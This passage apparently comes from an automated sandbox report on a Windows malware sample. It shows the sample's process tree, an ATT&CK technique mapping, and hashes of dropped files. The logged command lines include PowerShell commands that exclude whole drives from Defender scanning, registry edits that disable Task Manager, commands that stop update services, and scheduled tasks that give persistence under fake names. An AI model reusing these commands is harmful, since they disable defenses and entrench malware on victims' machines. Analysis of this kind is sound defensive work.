PID 2828 wrote to memory of 2876	2828	ServerComponenthostMonitorDll.exe	70
PID 2828 wrote to memory of 2876	2828	ServerComponenthostMonitorDll.exe	70
PID 2828 wrote to memory of 2876	2828	ServerComponenthostMonitorDll.exe	70
PID 2828 wrote to memory of 620	2828	ServerComponenthostMonitorDll.exe	71

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:612
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:672
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:688
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  - Indicator Removal: Clear Windows Event Logs
  PID:760
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:824
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1176
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {AA026724-CCFE-45CA-BC4F-838BE0237FF2} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Loads dropped DLL
    PID:2276
  - - C:\Program Files\Google\Chrome\updater.exe
      "C:\Program Files\Google\Chrome\updater.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Program Files directory
      PID:3032
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:980
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:268
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:300
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1080
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1124
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1532
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1044
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2504

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1212
- C:\Users\Admin\AppData\Local\Temp\AstralprivateDLL.exe
  "C:\Users\Admin\AppData\Local\Temp\AstralprivateDLL.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe
    "C:\Users\Admin\AppData\Local\Temp\Astral private DLL.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2788
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2932
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2840
      - C:\containerperf\ServerComponenthostMonitorDll.exe
        
        "C:\containerperf/ServerComponenthostMonitorDll.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2828
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o51qwjhf\o51qwjhf.cmdline"
        7⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:2432
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFAC.tmp" "c:\Windows\System32\CSC1090B04C6D9E4F1BA7A1E161AD8F0D1.TMP"
        8⤵
        
        PID:2992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/containerperf/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\schemas\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Journal\en-US\Idle.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\sppsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\addins\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\containerperf\ServerComponenthostMonitorDll.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:888
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mzwcZexlH7.bat"
        7⤵
        
        PID:892
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:1940
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2160
        
        C:\Program Files\Windows Journal\en-US\Idle.exe
        
        "C:\Program Files\Windows Journal\en-US\Idle.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
- - C:\Users\Admin\AppData\Local\Temp\twain_32.exe
    "C:\Users\Admin\AppData\Local\Temp\twain_32.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    PID:2600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:944
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2892
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1932
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2096
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2668
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1920
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1640
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1300
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1272
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2892
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2936
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2344
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2420
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1344
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1012
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1656
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1864
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2980
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2268
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2036
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:2820
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2676
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1360
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2148
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:640
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2244
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:2468
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:2700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\schemas\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\schemas\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Windows\schemas\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Journal\en-US\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\en-US\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Journal\en-US\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Recovery\480d7142-91a3-11ef-b9f6-6e5a89f5a3c7\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\addins\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\addins\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Windows\addins\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 9 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDll" /sc ONLOGON /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 7 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2424

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "26735387430326407453677870915310133771916052406104667386111014146032051985182"
1⤵
PID:1928

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "539054497-1355100227-1423920471-7610450151407815963-531202855-937090716-2067156390"
1⤵
PID:2416

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1782511161903637964-1304866907-967315142-1236673411-303184683-1854448870-942142125"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1040555575-761543106-216554864-1688510449-233006236-787167256913381662-66314508"
1⤵
PID:1500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1876786478-20660081542037467218-1368092856-1053458333-82576215626100824-1776662886"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "84994123365216992620260003891923669534-706727585-1461000693-1006084822-947255012"
1⤵
PID:1680

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19125338116884883-1287711403-434695661-946686885135304458410988035-2092756420"
1⤵
PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESEFAC.tmp

Filesize
1KB

MD5
20c07653a84a8bd5d181ab67de3ce7ad

SHA1
0161d273660fede1920a8a2cf49e5de94bc15dd7

SHA256
98da3457743eba5266592decaf6d4e18acbf8b9dcb06dd9e037624d3e494da19

SHA512
71fce0554f2d52f5a93dbd16adf987148d7fe62016699cb904b759a2be092aa8e582d9d668f5e26ff8846402977bcba69318a4106f5c13c0eb2b113344d168ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\mzwcZexlH7.bat

Filesize
175B

MD5
2ab90067efd38e2e179a88f72160e8d3

SHA1
1ffc231fc13baafa0a133b42dad1122b19bec601

SHA256
03ac245a721e1d4c9ec543d8a86c5ca8bf36d64d4bd1ad9cf096553fd312af34

SHA512
074e50adab6d4562beb7dd6a939e2832e93c10ec10d20824f2064605c4b74cc3c241b5bca43f7e476c6cfa84c728eb4f7af04c410b7c30b8acb9af50fc1f2908

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bd4309681371224d8bbd467d003ca872

SHA1
5591e234814f672a81949d18c874e73185afb18d

SHA256
19186c487045c9fd2b90cfeb9588abb80bc6fa25976a382658147d62edac5ed4

SHA512
fdcdd7520e7e4dad6cd1e0fde1bdeece3ac4e22d749c8d8dd47abda1cca23907205a2e34cfb3804db8cdea2531915147b4d774ad7919f4317594de6586933900

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ca983eb7df012d3b47f3bc1520f68946

SHA1
bfb225edcde38dff119e16e84a68eaedda9deda0

SHA256
7f95e6cbd9394c722f2b8920d21bb278f6cec242fd66db5a8d74bf614ded5e92

SHA512
dac37ea616832daf3b3a5c18e8cdc49dccb6dd724d58b7071e362547428f7efacb5e25e29a8f3547b3852ba63ef36b05c2d015898952d6eb3be00813aebec674

Download Submit
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC

Filesize
3KB

MD5
050a213973d44c04e920927ba283f1dd

SHA1
007fe109c2b4361fc7046217032cc8c0a4cb4123

SHA256
7e2ae9f707f1fd03a5ee3c924ce1e3d26b06e9767df23d1755c93a6990a9ab03

SHA512
898a022b37316de591190597f469106bad23e89ce1fadbf1289574db236299477084e354ecd19ef107bab73317dfdd955d80652fb0e29cf90a80a5b90187c519

Download Submit
C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat

Filesize
200B

MD5
705bbadbf818277ddd38afa10533756b

SHA1
1d5fb39c2793854e8c7d848798e39c659aa3e22d

SHA256
871ef6a27bc10a920ce0890b50bf9926b7dbd4eea19a97a19bb837be7a97e5f3

SHA512
f8c46c4e4e31445a397af9f437b86b15edd48047c24f9c78f0e49efa28ea293465cb7aef242e71b2d127deba3827aee8f00c7cc11085f8c05a771b1cfbf36c31

Download Submit
C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe

Filesize
230B

MD5
3ef9810ceb57153ab80dd204f33e7f91

SHA1
3fd4057ecad16cf11f2cab6d0ad44be3bd4b0e3f

SHA256
